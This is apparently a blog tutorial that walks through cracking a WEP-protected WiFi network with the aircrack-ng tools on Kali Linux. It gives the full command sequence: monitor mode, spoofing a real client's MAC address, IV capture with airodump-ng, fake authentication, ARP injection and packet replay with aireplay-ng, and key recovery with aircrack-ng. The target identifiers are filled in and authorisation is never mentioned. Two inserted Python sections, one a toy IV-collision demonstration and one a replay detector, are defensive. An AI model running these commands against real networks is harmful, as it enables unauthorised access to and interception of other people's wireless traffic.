Today, we commonly find wireless networks all around us. Most wireless networks are encrypted using WEP or WPA. In a previous post, I covered a dictionary attack on WPA networks. In this post, I'll cover WEP, which has a weak mechanism and is therefore easy to crack compared to WPA and WPA2.
Theory
WEP, short for Wired Equivalent Privacy, is one of several encryption schemes used to secure wireless networks. At the time of its conception, WEP was believed to be secure. However, a flaw was found in the way the initialization vectors (IVs) in the headers of data packets are used, which makes it possible to crack WEP once enough IVs have been collected. The attacks shown in this tutorial take advantage of this weakness in the initialization vectors of wireless packets. When enough packets have been collected, the key for the WEP-secured network can be recovered with WiFi auditing tools such as aircrack-ng. Kali Linux includes aircrack-ng among its top 10 security tools for testing the vulnerability of computer networks. In this post, I'll demonstrate how a WEP key can be easily found using the aircrack-ng tools in Kali Linux. However, a problem may arise when there are multiple keys in use instead of just one.
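To make the theory above concrete, here is a small Python sketch of why the IV design is the problem. It is an added illustration, not code from the original post or from the aircrack-ng project. It computes the birthday bound for the 24-bit IV space (how soon an IV must repeat) and shows that two frames encrypted under the same IV leak the XOR of their plaintexts with no key involved. The key, IV and frame contents are constructed values, and the keystream is a seeded PRNG that merely stands in for RC4; it does not implement the statistical key-recovery attack the tools use.

```python
"""Toy model of the WEP IV weakness (added illustration, not the post's code).

WEP encrypts each frame with RC4 keyed by (24-bit IV || secret key) and
sends the IV in the clear. Two things follow: the IV space is tiny, so IVs
repeat after a few thousand frames, and any two frames encrypted under the
same IV share a keystream, so XOR-ing their ciphertexts cancels the key.
The keystream below is a seeded PRNG standing in for RC4 (NOT RC4), and the
key and frames are constructed values.
"""
import math
import random

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 possible IVs


def iv_collision_probability(frames: int, space: int = IV_SPACE) -> float:
    """Birthday-bound probability that at least two of `frames` randomly
    chosen IVs coincide: 1 - exp(-n(n-1) / 2N)."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def frames_for_collision_probability(p: float, space: int = IV_SPACE) -> int:
    """Smallest frame count whose collision probability reaches p
    (the inverse of the formula above)."""
    return math.ceil(0.5 + math.sqrt(0.25 - 2.0 * space * math.log(1.0 - p)))


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Deterministic toy keystream derived from (iv, key). Not RC4; it only
    reproduces the property that the same (iv, key) gives the same stream."""
    rng = random.Random(iv + key)
    return bytes(rng.getrandbits(8) for _ in range(length))


def wep_like_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """XOR the frame body with the keystream; the IV travels in the clear."""
    ks = keystream(key, iv, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_reuse_leak(key: bytes, iv: bytes, pt1: bytes, pt2: bytes) -> bool:
    """Two frames under one IV: ct1 XOR ct2 equals pt1 XOR pt2, and the key
    drops out entirely. This is the core of what 'weak IVs' means."""
    ct1 = wep_like_encrypt(key, iv, pt1)
    ct2 = wep_like_encrypt(key, iv, pt2)
    return xor_bytes(ct1, ct2) == xor_bytes(pt1, pt2)


if __name__ == "__main__":
    n = frames_for_collision_probability(0.5)
    print(f"50% chance of an IV repeat after about {n} frames")
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key
    iv = bytes.fromhex("00002a")        # constructed IV
    print("same IV leaks plaintext XOR:",
          iv_reuse_leak(key, iv, b"who-has 192.168.1.1?", b"is-at   192.168.1.9 "))
```

Run it and the birthday bound comes out at roughly 4,800 frames for a 50% chance of a repeated IV, which is seconds of traffic on a busy network; that, not the RC4 cipher itself, is why a longer 128-bit key does not rescue WEP and why the remedy is to migrate the network to WPA2.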
What You Need To Follow The Steps In This Tutorial
You need Kali Linux and basic knowledge of Linux. Kali Linux is a Debian-based Linux distribution for testing network security. Kali Linux currently supports PCs and ARM-powered machines. If you use a PC, download the Kali Linux ISO and burn it to a blank DVD with InfraRecorder or another tool. Then, boot your computer from the Kali Linux DVD. You should be automatically presented with the dark GNOME desktop. For information on running Kali on ARM hardware, see this page.
Let's Crack WEP
- Open the GNOME Terminal (the square icon with >_) and type the command to load the driver for your wireless network card or USB WiFi adapter. You may have to put the required firmware in /lib/firmware before loading the driver, because Kali Linux lacks firmware for some drivers. For example, to load the b43 driver, type:
modprobe -r b43
modprobe b43
If the WiFi driver is working, the network icon in the top right corner of the screen will list the available wireless networks when you click on it.
- Use kismet to find information about the WEP-secured wireless network that you want to crack. This post shows you how. You need the following information:
- Name of the wireless network (ESSID)
- MAC address of the access point (BSSID)
- Channel of the wireless network
- MAC address of wireless clients
- Type the following commands to put your wireless device wlan0 into monitor mode.
airmon-ng stop wlan0
airmon-ng start wlan0
- Change the MAC address of your wireless network card. This may or may not work depending on the hardware used. In the example, 6C:83:36:6C:65:CD is the new MAC address for your wireless card. Usually, this is the actual MAC address of an existing wireless client associated with the target network. With the fake MAC, we're going to trick the access point with one of the following attacks.
ifconfig wlan0 down
ifconfig wlan0 hw ether 6C:83:36:6C:65:CD
ifconfig -a
- Start airodump-ng, which will sniff the wireless traffic of the target network and collect good IVs (initialization vectors, part of the WEP encryption data). The log file will be used later to find the WEP key. The number after the -c option is the channel of the wireless network to listen to. The screen will show wireless networks and associated clients, if any, with a set of counters that keep increasing. Don't stop airodump-ng or close the terminal yet. Just leave the terminal open.
airodump-ng -w logfile -c 6 --ivs wlan0
- In the following attacks, we are going to use aireplay-ng. Aireplay-ng is a handy tool for generating more wireless traffic in order to collect a sufficient number of good IVs. It does so by injecting or replaying captured packets to fool the access point into giving us what we need. Open another tab in GNOME Terminal. This attack will associate the target wireless client with the access point.
aireplay-ng -1 30 -e WIFINET -a 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD wlan0
The -e option specifies the network name, the -a option specifies the MAC address of the AP, and the -h option specifies the MAC address of the wireless client. You can use macchanger to view and change your MAC address, for example, macchanger -s wlan0. Then, you can associate your own wireless adapter when there are no clients connected to the wireless network in the first place.
- ARP injection is slow but always works. While airodump-ng is listening, open another tab in GNOME Terminal and start the ARP injection attack.
aireplay-ng -3 -b 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD wlan0
The -b option specifies the MAC address of the AP and -h specifies the MAC address of the associated client. Let it run, and airodump-ng will pick up the traffic. If no client is connected, we can create one with the fake authentication described above.
- This attack generates traffic by asking the access point to resend data packets. Open another tab in GNOME Terminal and start the interactive packet replay attack.
aireplay-ng -2 -b 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD -n 160 -p 0841 -c FF:FF:FF:FF:FF:FF wlan0
The -b option specifies the MAC address of the AP and -h specifies the MAC address of the associated client.
- After enough packets have been collected and saved, aircrack-ng can be used to crack the WEP key.
aircrack-ng -a 1 -b 00:23:97:26:66:A3 -n 64 logfile-01.ivs
Replace the filename with the log file that was previously generated by airodump-ng. Also, specify the access point's MAC address with the -b option. The -n option specifies whether the WEP key is 64-bit or 128-bit. The -a 1 option specifies that we're cracking WEP.
If you still can't crack WEP with tons of IVs, increase the fudge factor with the -f N option (N>=2). It'll take much longer to crack, but you'll have a better chance of success.
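Seen from the other side of the air, the fake authentication and packet replay steps above have a distinctive footprint: a station that keeps re-transmitting an identical WEP frame, and therefore an identical IV, many times per second, where a real driver advances its IV on every frame. The following Python script is an added example (not from the original post, and not the logic of any particular wireless IDS) that flags such a transmitter from decoded frame metadata. The frame records are constructed inline; the MAC addresses, threshold and window are assumptions you would tune to your own environment.

```python
"""Detection-side view of the replay steps (added example, not the post's code).

The records are constructed 802.11 frame metadata of the kind a wireless IDS
or a decoded capture would give you: time stamp, transmitter MAC, frame kind
and, for WEP data frames, the IV sent in the clear.
"""
from collections import defaultdict


def build_sample_frames():
    """Constructed sample: one ordinary client plus one station that re-sends
    the same frame (same IV) 200 times in two seconds. MACs are made up."""
    frames = []
    for i in range(40):                                    # ordinary client
        frames.append({"t": 0.5 * i, "src": "AA:AA:AA:AA:AA:01",
                       "kind": "data", "iv": f"{i:06x}"})   # fresh IV each frame
    frames.append({"t": 9.0, "src": "BB:BB:BB:BB:BB:02",
                   "kind": "auth", "iv": None})            # management frame, no IV
    for i in range(200):                                   # replaying station
        frames.append({"t": 10.0 + 0.01 * i, "src": "BB:BB:BB:BB:BB:02",
                       "kind": "data", "iv": "00d1ce"})     # same IV every time
    return frames


def find_replay_sources(frames, window=5.0, min_repeats=20):
    """Return {src: peak count} for transmitters that sent the same WEP IV at
    least `min_repeats` times inside any `window`-second span.
    Thresholds are assumptions chosen for this constructed sample."""
    times_by_key = defaultdict(list)
    for f in frames:
        if f["kind"] == "data" and f.get("iv") is not None:
            times_by_key[(f["src"], f["iv"])].append(f["t"])
    hits = {}
    for (src, _iv), times in times_by_key.items():
        times.sort()
        start = 0
        peak = 0
        for end, t in enumerate(times):        # sliding window over sorted times
            while times[start] < t - window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_repeats:
            hits[src] = max(hits.get(src, 0), peak)
    return hits


if __name__ == "__main__":
    for src, count in find_replay_sources(build_sample_frames()).items():
        print(f"replay suspected from {src}: same IV {count} times within 5 s")
```

An alert like this buys time, not safety: the only durable fix for the weakness the tutorial exploits is to retire WEP and move the network to WPA2 with a strong passphrase, with the detection kept as a check that no legacy WEP access point has been left behind.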